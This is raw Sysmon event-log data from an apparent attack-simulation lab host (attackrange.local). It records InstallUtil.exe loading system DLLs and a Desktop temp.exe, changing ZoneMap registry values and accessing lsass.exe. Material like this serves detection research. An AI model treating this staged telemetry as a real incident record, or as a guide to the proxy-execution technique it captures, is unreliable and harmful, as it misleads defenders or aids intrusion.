16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\7a31f084b842deabeeea41728f172462\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=3A31931D0C2ED79A7D5DAA5EFFF0F6E7,SHA256=5941CBC9C68A2416AB0513002DC388760D7956E487C50BFC5CE2103FB9B89939false-Unavailable 734700x800000000000000057561263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValid 734700x800000000000000057561262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValid 734700x800000000000000057561261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=4937BBA430F4AEEC4D0DC03A200348C3,SHA256=CDA95E98B9D37602AD11B97FDBF7BDDD2F79170CA5E140EB9D2A1B04E94E037FtrueMicrosoft WindowsValid 13241300x800000000000000057561260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057561259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057561258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057561257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057561256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-886B-6164-0B00-00000000F101}648812C:\Windows\system32\lsass.exe{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057561255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-886B-6164-0B00-00000000F101}648812C:\Windows\system32\lsass.exe{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057561254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\temp.exe0.0.0.0 --temp.exeMD5=241EFADAEB0717C0929F85B612829C47,SHA256=DA2D16A61E96095E650C6542306BCF3211A5F21736CF61F67F5A1AFA91DDF7F0false-Unavailable 734700x800000000000000057561253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\temp.exe0.0.0.0 --temp.exeMD5=241EFADAEB0717C0929F85B612829C47,SHA256=DA2D16A61E96095E650C6542306BCF3211A5F21736CF61F67F5A1AFA91DDF7F0false-Unavailable 12241200x800000000000000057561252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057561251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValid 734700x800000000000000057561250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=DDB56B83B18735F13FD1CBEF877E9DB0,SHA256=C5EF7185888F971CFA486B64D71514512C1CCBAB8C5A1D8610CAE54476407126trueMicrosoft WindowsValid 734700x800000000000000057561249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=294BC43051C27ADB96A957A6FB9448BE,SHA256=9564D3F69345F9883161007F2E26298FD377B023D1D46C0AAE9821B4B26A74B3trueMicrosoft WindowsValid 734700x800000000000000057561248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValid 734700x800000000000000057561247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=57F1700836CDEBA98A7CF770A15A9CF6,SHA256=781F8901F292ED968270E4605154B3B794BB3770EA7C751D94B6F3B21A5EB1C4trueMicrosoft WindowsValid 734700x800000000000000057561244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.038{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\601bda4ba29a8d6b7b125b94c2697c8b\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=7372BB83C92065CC175F5B104E9A505D,SHA256=56381C9335A77E1478F8F27DBB70D877FD443C41210E6F6D6E34FFDB3E5DE463false-Unavailable 734700x800000000000000057561243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.038{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System\2c8d66b5ef1d563cf9010bf4428ff9d2\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=88C6A31917BA9F2506E523DA037CC8DF,SHA256=15CD43739560489AEC0A752ACF5403A467319AC8E978DE279C702C74E792C5F2false-Unavailable 734700x800000000000000057561242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.038{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValid 734700x800000000000000057561241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.038{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValid 734700x800000000000000057561240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.038{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=057E8B1C10BCFC56E238FFC109C7A01E,SHA256=E164F2C2B70575ECF5C8B266E84A6C3236C18A6F09AE09A99F59AC6B0AEAF8E8trueMicrosoft CorporationValid 734700x800000000000000057561239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.038{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=2BDBEE1B42063F245AC86F54C236BC4E,SHA256=CD558E008DA76E171FC9B8CF87556353330D7B7BF593B5074E4FEB08BC14CFC6trueMicrosoft WindowsValid 734700x800000000000000057561238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.038{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7ded6822b7c67ccde0dc9249bee0271b\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=7BF3C3EF641852F9D4CCF7E80B1AFF13,SHA256=C7054ABC20409CCC86D1EF10E8B11369937FB5E81DFD9F15B31639071036CA9FtrueMicrosoft CorporationValid 734700x800000000000000057561237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.038{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValid 734700x800000000000000057561236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=BFE20E1D9BEBE61CD8898663FDACB74E,SHA256=AA416A9E707BE8475051FF502D20077A687D14CF3ABABF4959F489A3B5BFBF8BtrueMicrosoft CorporationValid 734700x800000000000000057561235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=071309BE821483287A0FE982AEF005C1,SHA256=932920FE06897C0B2ADAF7FA855E3B45498D213994E81AB8694D9EE5CA53AC0AtrueMicrosoft CorporationValid 13241300x800000000000000057561234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:48:34.022{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7e5-0x217fd3d6) 734700x800000000000000057561232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=9C0F4F0DC954D96E7D70E5FBD85D7EE6,SHA256=A4C9BBF0836A49DADBDD87ED8372D290CCC0A0177B0D4B484AD18DC9C7BCC073trueMicrosoft CorporationValid 734700x800000000000000057561231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValid 734700x800000000000000057561230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValid 734700x800000000000000057561229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValid 734700x800000000000000057561228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValid 734700x800000000000000057561227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValid 734700x800000000000000057561226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F7E6254059E93E3FBD7FE0E3C5615605,SHA256=1AD1D4229C9FF3B4D041E4B4973A83BE2078EECD11E9EC00E4C0B42EAB20E07AtrueMicrosoft WindowsValid 734700x800000000000000057561225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValid 734700x800000000000000057561224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValid 734700x800000000000000057561223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=6FDB4F1612AC70891B9F6E6005AA5DDB,SHA256=6DFEC2EE6E2A7CB4409AB824737A3657E6D66E309AFE83C28E0CE0676687F737trueMicrosoft WindowsValid 734700x800000000000000057561222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValid 734700x800000000000000057561221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.022{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=606B77C072A964DA4E4710151CAC86EB,SHA256=C6C9E8D77B62C7A52E6E9EAC764C1E1345779FC17544B80730E507627A5D5120trueMicrosoft CorporationValid 734700x800000000000000057561220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=D1F45F71014220112988A7BF64EE83EE,SHA256=60E8C6D420FC4AFF309FE9CB53327D8DC4EC541F627E4461C465561512D1ED5DtrueMicrosoft WindowsValid 734700x800000000000000057561219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValid 734700x800000000000000057561218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=580643DD40890B231399EA5F57EFAA70,SHA256=0B374B1825ABFF7B26170E75F1B638DF08A15B07660A7DF5533F02853CF266C6trueMicrosoft WindowsValid 734700x800000000000000057561217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=990CA13B9FE19A5A611F77B333BC9AAD,SHA256=EC3960CAABA4FC0287601311BDCC14D472A165DA7C43F88665D984CE1A0B7DE4trueMicrosoft WindowsValid 734700x800000000000000057561216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=3394E4EEB4851D80DD7548EC87EAEA5F,SHA256=7F670ACCE58EAADE796FEF335B4EAEAB66DFC47875219B9BE3C9B405A452450BtrueMicrosoft WindowsValid 734700x800000000000000057561215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValid 734700x800000000000000057561214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 